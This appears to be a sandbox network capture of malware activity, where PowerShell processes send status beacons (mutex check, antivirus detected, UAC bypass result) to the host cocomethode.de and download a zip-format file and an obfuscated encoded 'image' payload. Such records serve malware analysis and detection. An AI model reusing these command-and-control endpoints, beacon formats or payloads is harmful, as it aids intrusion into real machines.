2024-12-11 11:29:07 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba5594b7f8efa9d5a67dc965e450f19373 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 85
2024-12-11 11:29:07 UTC	85	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4a 6f 62 20 69 73 20 72 75 6e 6e 69 6e 67 2e 20 4a 6f 62 20 49 44 3a 20 31 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 43 68 65 63 6b 20 6d 75 74 65 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Job is running. Job ID: 1\"", "\"Check mutext\"", "----------"]
2024-12-11 11:29:07 UTC	1209	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:07 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gtskv2JJUxgLDJn6C1ZWGaOvMBZm9TJfot7u3av3Qbx7t3c4X6UYtyEnhUMS9oN6AF2NEmprVhuIn978e%2BGPN9zWyuH8WXazbNEPdqvJ5ZPq7H3P9bfjDs5PyI7hDH%2BudBH%2FB58mHgR3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=37505&min_rtt=1124&rtt_var=21315&sent=6503&recv=2691&lost=0&retrans=0&sent_bytes=9287055&recv_bytes=41806&delivery_rate=16375442&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f0522953fabb0a4-ATL server-timing: cfL4;desc="?proto=TCP&rtt=75&min_rtt=51&rtt_var=26&sent=8&recv=10&lost=0&retrans=0&sent_bytes=8417&recv_bytes=1866&delivery_rate=1283980392&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113880&min_rtt=113844&rtt_var=24069&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1029&delivery_rate=33616&cwnd=252&unsent_bytes=0&cid=b5d8a58cdff747e2&ts=585&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49744	104.21.1.51	443	1804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:08 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba5594b7f8efa9d5a67dc965e450f19373 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 86
2024-12-11 11:29:08 UTC	86	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4d 75 74 65 78 20 69 73 20 6e 6f 74 20 6c 6f 63 6b 65 64 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 41 56 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Mutex is not locked\"", "\"AV Windows Defender\"", "----------"]
2024-12-11 11:29:08 UTC	1195	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:08 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uXd0juyL91700lqj1Wshhb5v0kynPkB5wM4dWbsrFajW2WwqZ5P90RPdqnDvUKpaMRKb86MAf6%2Bhhd1FLKNsSjtGHnM%2FQ4ARwkZPLcY2NamIBKYxgQlnG4Dszc8WpcGVFAudyod9q%2FFX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=11016&min_rtt=1490&rtt_var=16883&sent=6064&recv=2866&lost=0&retrans=0&sent_bytes=8638264&recv_bytes=32965&delivery_rate=23968593&cwnd=280&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05229acf63458d-ATL server-timing: cfL4;desc="?proto=TCP&rtt=59&min_rtt=59&rtt_var=29&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=625&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113716&min_rtt=113700&rtt_var=24008&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1030&delivery_rate=33674&cwnd=252&unsent_bytes=0&cid=8ddd089322f420b2&ts=825&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49745	104.21.1.51	443	8600	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:08 UTC	389	OUT	GET /file2/961e923217e6366fedc4ef058b135504177a85e5d4a3d3fefcd20dd6a4bae06bcd34fb5dbb1a738ebd5d59c383ddda7ae733b974b62b8e600a867205fe86acb615bbb394f676a9487f0a6d13dbf465585b805cd5c966e21c3b43adfc54fca65e29f108cd32057c0ab0de90b77ba7bdfc HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Connection: Keep-Alive
2024-12-11 11:29:09 UTC	1326	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:09 GMT Content-Type: application/octet-stream Content-Length: 4613 Connection: close content-disposition: attachment; filename=file; filename*=UTF-8''file CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CdPVCMP4MdgVBv%2BD2duGDkl%2BYgucuNOkIZvzEhkSDL7klNdGGl1ervhmI9qaVGrDhXxiVHI0eixQdOVkickuedwh2IPkTD7kwp%2Byhjhu47G5GNZbtSkwB%2FCt0b%2BFvuDlLmHJ0IxXimTd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24043&min_rtt=1366&rtt_var=28301&sent=6608&recv=2858&lost=0&retrans=0&sent_bytes=9474412&recv_bytes=26118&delivery_rate=37871447&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f05229ebb3f4546-ATL server-timing: cfL4;desc="?proto=TCP&rtt=45&min_rtt=43&rtt_var=20&sent=3&recv=5&lost=0&retrans=0&sent_bytes=3958&recv_bytes=1247&delivery_rate=1109881355&cwnd=118&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=114042&min_rtt=113996&rtt_var=24117&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1003&delivery_rate=33563&cwnd=252&unsent_bytes=0&cid=943cbc76586913c9&ts=589&x=0"
2024-12-11 11:29:09 UTC	43	IN	Data Raw: 50 4b 03 04 14 00 08 00 08 00 17 7e 7c 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 5f 72 65 6c 73 2f 2e 72 65 6c 73 8d 8f Data Ascii: PK~\|Y_rels/.rels
2024-12-11 11:29:09 UTC	1369	IN	Data Raw: 3b 0e c2 30 10 44 af 62 6d 4f 36 50 20 84 e2 a4 41 48 69 a3 70 00 cb de 38 51 e2 8f 6c f3 bb 3d 2e 28 08 a2 a0 1c ed cc db 99 aa 79 98 85 dd 28 c4 c9 59 0e db a2 04 46 56 3a 35 59 cd e1 d2 9f 37 07 68 ea aa a3 45 a4 ec 88 e3 e4 23 cb 11 1b 39 8c 29 f9 23 62 94 23 19 11 0b e7 c9 e6 cb e0 82 11 29 cb a0 d1 0b 39 0b 4d b8 2b cb 3d 86 4f 06 ac 99 ac 17 41 53 e2 70 77 41 a1 72 f2 6a c8 a6 22 e3 80 b5 8a 83 9f 75 d7 aa dc ad 7f 7a fa e7 b3 1b 86 49 d2 e9 0d fa 51 e0 cb 01 0c eb 0a 57 33 eb 17 50 4b 07 08 4f 8b dd 3c a6 00 00 00 1c 01 00 00 50 4b 03 04 14 00 08 00 08 00 17 7e 7c 59 00 00 00 00 00 00 00 00 00 00 00 00 1c 00 00 00 77 6f 72 64 2f 5f 72 65 6c 73 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c 2e 72 65 6c 73 ad 90 cb 0a c2 30 10 45 7f 25 cc de a6 75 21 22 4d Data Ascii: ;0DbmO6P AHip8Ql=.(y(YFV:5Y7hE#9)#b#)9M+=OASpwArj"uzIQW3PKO<PK~\|Yword/_rels/document.xml.rels0E%u!"M
2024-12-11 11:29:09 UTC	1369	IN	Data Raw: 75 47 56 35 68 53 08 45 46 82 63 f8 51 ea 69 65 82 03 34 48 4c 19 04 b2 e1 01 27 af 91 30 35 5b 05 fc 44 6f ae 4d dd 12 93 d6 5d 9c 4f 1c 06 f9 f8 43 ce 35 2b 16 fa a0 5e dd 05 f5 62 f7 96 c1 0a e7 42 7f 79 1a a7 94 16 84 c7 c7 04 3e 6e e5 32 a0 8c f0 21 2e 2a 09 d1 62 a1 27 96 01 5f 06 d0 52 5a 1b ae 3a ea ef 0d 9a 1a 01 11 2c 27 bb 61 f1 e1 6d a6 f3 4c e7 e3 90 f6 58 75 69 d4 20 77 d0 ee 3d 06 a9 70 7c 48 ea 44 6a a1 42 09 99 e5 b3 1e 18 87 b4 c7 aa 07 de a1 0a 58 3c 50 01 f9 5b 9f 71 78 6c 1c f6 6b dd ec c6 5b ee 61 dd a2 b3 b9 01 65 1a 4a 84 c9 80 cc 80 3c 36 20 13 fc a2 93 24 eb 46 41 cc c8 7a d4 39 74 1d 64 c9 78 f2 15 f7 0c fd 48 04 72 74 e7 68 7d c5 50 70 55 0d c3 d9 66 f9 05 9d 35 74 0b d1 53 9c 07 e7 4d 4d e1 e5 bd 27 b8 ec 17 68 3d 45 6d b1 c3 Data Ascii: uGV5hSEFcQie4HL'05[DoM]OC5+^bBy>n2!.*b'_RZ:,'amLXui w=p\|HDjBX<P[qxlk[aeJ<6 $FAz9tdxHrth}PpUf5tSMM'h=Em
2024-12-11 11:29:09 UTC	1369	IN	Data Raw: 87 74 c6 0e 28 95 aa 32 f5 69 5b ee b0 a8 85 af a0 8e 25 f0 07 bc 99 b9 2e 73 dd 38 a4 3d 56 b5 72 15 d2 b1 15 1d d7 1d d4 8b ce e7 c6 65 40 1e 1f 90 7b ff 6e 4b 19 cc 08 16 68 90 f3 d0 73 53 6d 72 d8 62 45 a6 dd 91 70 83 63 56 2a 89 9f 63 ea 32 bd 48 09 bc 24 ec 75 44 97 0e 46 b1 40 1b 83 32 b1 65 62 1b 87 b4 c7 aa 47 e6 a6 ae 83 96 a9 b0 da 4d b4 89 33 9f 65 1c 1e 3f 7b 4a a0 eb 45 7b 6b a8 d6 ad 07 1d c9 68 03 76 89 ae 9a 38 00 69 e7 b8 15 fb 44 e3 41 ac 13 ee 1b c5 a5 8e ae 9c 82 7b f2 e3 06 9b 69 62 ba f1 20 dc 99 b6 be d2 83 4b 43 9d 81 a8 74 74 0e a9 a5 36 7a ba bf 12 b7 fc 64 3e cc 7c 38 0e 69 8f 55 0f dd e2 17 7e 7a c3 37 9b ec d5 65 f4 1d 1d 7d d7 bc 46 2a e3 96 d8 2c d2 1b b2 12 d8 c1 fe ce 7e b3 4c c7 65 71 17 0d 3b f9 d9 98 35 3a 74 bb 02 24 Data Ascii: t(2i[%.s8=Vre@{nKhsSmrbEpcVc2H$uDF@2ebGM3e?{JE{khv8iDA{ib KCtt6zd>\|8iU~z7e}F,~Leq;5:t$
2024-12-11 11:29:09 UTC	463	IN	Data Raw: 95 d9 1a 60 6f 2a 97 17 e5 89 23 e7 a8 0c 93 ff 80 4c 51 71 f1 26 db e8 bf 5b 60 39 3b c0 cb 57 58 e7 6e 7c b9 dc 4b f7 05 50 4b 07 08 ff 62 6b ba f3 00 00 00 5d 02 00 00 50 4b 01 02 2d 00 14 00 08 00 08 00 17 7e 7c 59 4f 8b dd 3c a6 00 00 00 1c 01 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5f 72 65 6c 73 2f 2e 72 65 6c 73 50 4b 01 02 2d 00 14 00 08 00 08 00 17 7e 7c 59 dc f3 00 c0 b6 00 00 00 96 01 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 df 00 00 00 77 6f 72 64 2f 5f 72 65 6c 73 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c 2e 72 65 6c 73 50 4b 01 02 2d 00 14 00 08 00 08 00 17 7e 7c 59 7b af 0c 1e ab 0b 00 00 e1 ac 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 df 01 00 00 77 6f 72 64 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c 50 4b 01 02 Data Ascii: `o*#LQq&[`9;WXn\|KPKbk]PK-~\|YO<_rels/.relsPK-~\|Yword/_rels/document.xml.relsPK-~\|Y{word/document.xmlPK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49746	104.21.1.51	443	1804	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:09 UTC	284	OUT	POST /609aafcaa17aae4dc51ce49a2e84612a74368b57fc4b8bec450f6e5cff9596ba5594b7f8efa9d5a67dc965e450f19373 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Content-Length: 62
2024-12-11 11:29:09 UTC	62	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 30 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 6f 20 63 61 6e 20 62 79 70 61 73 73 20 75 61 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "0", "\"ko can bypass uac\"", "----------"]
2024-12-11 11:29:09 UTC	1195	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:09 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mnIkFxIX4xbqk3tSj6d%2BtcWIg1EYg3S1u1grUy0SFjV8X0O8B%2FPFD443DgA4mJqLcwiRQlZIsAQzYw2AzqkuQ1eYC2gcQFQurRl2VchWTkz1qAKB4pTkMX%2FbFB2bQbSqpU2FvpUaJroG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=42233&min_rtt=1124&rtt_var=20176&sent=6509&recv=2697&lost=0&retrans=0&sent_bytes=9288609&recv_bytes=43924&delivery_rate=16375442&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f0522a199fc7bd5-ATL server-timing: cfL4;desc="?proto=TCP&rtt=66&min_rtt=66&rtt_var=33&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=601&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=113921&min_rtt=113853&rtt_var=24120&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1006&delivery_rate=33585&cwnd=252&unsent_bytes=0&cid=7375fb5261cbd983&ts=804&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	49750	104.21.1.51	443	8952	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 11:29:13 UTC	389	OUT	GET /file2/442d6d2bbbf95a0c2d98335c7cf12d9d4a2163bfd33f42547d8e2176349fc5bec999df77ed6fc10cd2b8f1bf6e1419afd1b8e652d60820a56f5d872b9832d58cfe65348bdb616db23e43f7972daf391f13bd6a69c891902807aad423627811c8e0d4aa7ee939d745201eed806ee979fa HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: cocomethode.de Connection: Keep-Alive
2024-12-11 11:29:14 UTC	1298	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 11:29:13 GMT Content-Type: application/octet-stream Content-Length: 12128 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NvLH8Mp8rJ87Zna2MVzaj2XjYUo0KS00FH5OsRJyLEG6kCHOUdam%2FNq08USgsOYseccBGB6TS4Mh3%2Flp0h7SgwXj%2B%2FS2QC2r9VWFBk9h%2Bqq1jCVyqOvAlxY3BD64%2Ft%2Fe%2FBC0DgSBF9og"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=42664&min_rtt=1124&rtt_var=15993&sent=6511&recv=2699&lost=0&retrans=0&sent_bytes=9289385&recv_bytes=45001&delivery_rate=16375442&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f0522ba8fa1bf9c-ATL server-timing: cfL4;desc="?proto=TCP&rtt=62&min_rtt=62&rtt_var=31&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=683&delivery_rate=0&cwnd=91&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" server-timing: cfL4;desc="?proto=TCP&rtt=43&min_rtt=43&rtt_var=21&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=669&delivery_rate=0&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
2024-12-11 11:29:14 UTC	1059	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 34 39 26 6d 69 6e 5f 72 74 74 3d 32 34 26 72 74 74 5f 76 61 72 3d 32 31 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 34 33 36 32 26 72 65 63 76 5f 62 79 74 65 73 3d 31 32 38 36 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 37 32 38 34 35 38 33 33 33 26 63 77 6e 64 3d 31 31 33 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 34 38 26 6d Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=49&min_rtt=24&rtt_var=21&sent=4&recv=6&lost=0&retrans=0&sent_bytes=4362&recv_bytes=1286&delivery_rate=2728458333&cwnd=113&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"server-timing: cfL4;desc="?proto=TCP&rtt=48&m
2024-12-11 11:29:14 UTC	381	IN	Data Raw: 25 6b 78 6d 62 71 76 6f 6c 72 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 50 30 4b 50 5b 47 69 52 65 33 53 58 54 6a 65 69 57 32 69 72 57 54 65 46 4c 46 47 45 52 54 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 6b 63 57 58 76 5b 47 69 4a 65 54 6d 45 54 6b 43 6b 63 6d 5b 72 53 47 47 77 5b 31 6d 45 50 56 65 6c 54 31 4b 70 56 57 69 52 60 6c 47 45 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6c 53 57 57 6d 5b 56 54 6d 4f 47 5b 44 30 54 60 32 65 6f 52 6a 58 35 65 57 4b 58 60 46 71 60 56 44 48 76 58 57 62 34 65 54 79 73 4c 56 79 6b 4c 31 34 6e 56 6b 4b 57 Data Ascii: %kxmbqvolr<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#P0KP[GiRe3SXTjeiW2irWTeFLFGERT4E`TGoRTOC[1mEPVekcWXv[GiJeTmETkCkcm[rSGGw[1mEPVelT1KpVWiR`lGEPkeDTV8oRTOC[1mEPVeKSlSWWm[VTmOG[D0T`2eoRjX5eWKX`Fq`VDHvXWb4eTysLVykL14nVkKW
2024-12-11 11:29:14 UTC	1369	IN	Data Raw: 47 77 55 6a 4f 6f 4c 44 75 60 63 6d 5b 30 56 55 4f 52 62 46 48 78 4f 46 65 52 53 7b 6a 7b 58 6c 30 35 65 6d 6d 59 54 59 53 52 63 56 79 7b 56 6d 5b 6a 62 46 53 49 60 47 4f 60 56 47 4b 34 5b 57 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 6f 58 31 65 46 64 57 6d 59 4c 46 65 4d 50 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 68 58 7b 4f 52 64 56 47 59 4f 56 34 58 54 30 48 79 58 33 30 32 62 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 65 49 71 6a 52 44 71 76 58 6c 30 6a 5b 44 71 49 54 6c 79 6b 4c 30 4b 76 58 6c 30 46 4c 46 47 59 4e 59 57 4c 50 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 68 58 57 62 30 4c 47 69 55 54 6f 53 5b 56 46 69 55 56 6d 69 52 64 56 47 59 57 6f 71 4b 53 45 43 6f 55 59 71 43 62 31 53 53 63 33 65 4b 50 31 47 6f 52 Data Ascii: GwUjOoLDu`cm[0VUORbFHxOFeRS{j{Xl05emmYTYSRcVy{Vm[jbFSI`GO`VGK4[WOBO1SSc3eKP1GoX1eFdWmYLFeMPUCMRTOC[1mEPVeKP1KhX{ORdVGYOV4XT0HyX302b1SSc3eKP1GoRTOC[1mFeIqjRDqvXl0j[DqITlykL0KvXl0FLFGYNYWLPUCMRTOC[1mEPVeKP1KhXWb0LGiUToS[VFiUVmiRdVGYWoqKSECoUYqCb1SSc3eKP1GoR
2024-12-11 11:29:14 UTC	1369	IN	Data Raw: 4b 50 31 47 6f 52 54 4f 42 4e 54 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 48 34 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 71 4b 53 56 79 30 5b 46 31 34 62 6d 71 55 4c 57 69 60 57 31 71 55 56 6d 69 46 4c 57 71 58 55 6b 43 4b 52 47 4b 33 52 54 65 52 65 6c 50 78 4f 59 4f 68 4c 6a 5b 73 52 54 69 52 63 30 71 55 50 6c 30 69 57 32 69 72 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 56 79 30 5b 46 31 34 62 6d 71 55 4c 57 69 60 57 31 71 55 56 6d 69 46 4c 57 71 58 55 6b 43 4b 50 7b 47 56 57 56 75 73 5b 31 71 48 57 6f 6d 68 50 31 47 31 57 45 4f 56 4c 47 4b 75 63 49 Data Ascii: KP1GoRTOBNTSSc3eKP1GoRTOC[1mEPVeKP1GoRTOC[1SSc3eKP1GoRTOC[1mEPVeKP1H4SGGw[1mEPVeKP1GoRTOC[1mEPVqKSVy0[F14bmqULWi`W1qUVmiFLWqXUkCKRGK3RTeRelPxOYOhLj[sRTiRc0qUPl0iW2irSGGwUjOqPVeKP1GoRTOC[1mEPVeKSVy0[F14bmqULWi`W1qUVmiFLWqXUkCKP{GVWVus[1qHWomhP1G1WEOVLGKucI
2024-12-11 11:29:14 UTC	1369	IN	Data Raw: 64 56 4b 75 57 6b 43 4b 53 30 5b 34 58 33 31 34 64 54 38 71 50 56 75 4d 50 30 4b 6c 55 46 75 56 4f 47 6a 78 57 6f 65 6a 53 33 79 33 58 6c 6a 30 55 6d 71 58 55 6f 71 5b 57 33 53 72 52 30 4f 4b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 5b 53 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6c 71 5b 56 47 4b 70 58 54 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 70 52 54 57 6e 60 46 4b 75 54 6f 4f 60 54 31 4b 33 5b 44 65 6e 63 46 4f 71 50 6c 79 6b 63 6a 71 33 58 33 34 4f 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 53 6c 53 57 57 6d 5b 56 54 6d 4f 47 5b 44 30 54 60 32 65 6f 52 56 75 56 64 56 4f 75 4e 59 6d 51 60 54 47 73 52 31 4f 52 5b 6a 79 73 57 6b 53 5b 4c 6d 5b 32 5b 44 65 Data Ascii: dVKuWkCKS0[4X314dT8qPVuMP0KlUFuVOGjxWoejS3y3Xlj0UmqXUoq[W3SrR0OKUjOqPVeKP1GoRTOC[3[SLDuKP1GoRTOC[1mEPlq[VGKpXTOBO1SSc3eKP1GoRTOC[1mEPVeKP1GpRTWn`FKuToO`T1K3[DencFOqPlykcjq3X34OUjOqPVeKP1GoRTOC[1mEPVeKSlSWWm[VTmOG[D0T`2eoRVuVdVOuNYmQ`TGsR1OR[jysWkS[Lm[2[De
2024-12-11 11:29:14 UTC	409	IN	Data Raw: 47 4b 32 58 32 71 77 65 6a 76 78 55 6f 5b 5b 4c 6b 6d 31 56 6d 69 52 63 33 48 78 54 6c 79 4c 63 57 4b 72 55 45 4b 60 62 46 4b 49 57 59 6d 4c 64 6a 30 32 56 56 30 4b 4c 44 38 54 52 6c 79 5b 64 6c 62 7b 55 31 53 73 4f 57 6d 54 52 6c 6d 4e 53 31 54 31 56 6c 30 47 4c 57 6d 37 63 46 79 60 57 30 5b 70 55 6a 53 5b 4f 57 6d 37 53 55 57 4e 57 30 57 32 56 56 71 6e 63 47 71 44 50 6c 75 4f 57 31 57 37 55 59 71 43 4c 44 34 70 63 46 69 5b 57 44 4b 70 55 30 53 53 4c 31 38 59 57 55 4f 4e 53 31 5b 70 55 57 65 53 65 31 35 78 53 6c 69 4f 63 54 6a 31 56 6c 30 53 4c 54 35 78 55 6c 30 4e 57 30 6d 32 56 56 30 53 64 6d 71 70 52 55 43 5b 64 6d 6a 31 56 6d 65 53 64 44 38 44 57 6c 75 4e 60 6d 4b 6e 55 30 65 46 60 6a 35 78 54 6c 79 4e 53 46 72 31 55 55 4b 60 63 44 34 59 57 59 71 4f Data Ascii: GK2X2qwejvxUo[[Lkm1VmiRc3HxTlyLcWKrUEK`bFKIWYmLdj02VV0KLD8TRly[dlb{U1SsOWmTRlmNS1T1Vl0GLWm7cFy`W0[pUjS[OWm7SUWNW0W2VVqncGqDPluOW1W7UYqCLD4pcFi[WDKpU0SSL18YWUONS1[pUWeSe15xSliOcTj1Vl0SLT5xUl0NW0m2VV0SdmqpRUC[dmj1VmeSdD8DWluN`mKnU0eF`j5xTlyNSFr1UUK`cD4YWYqO
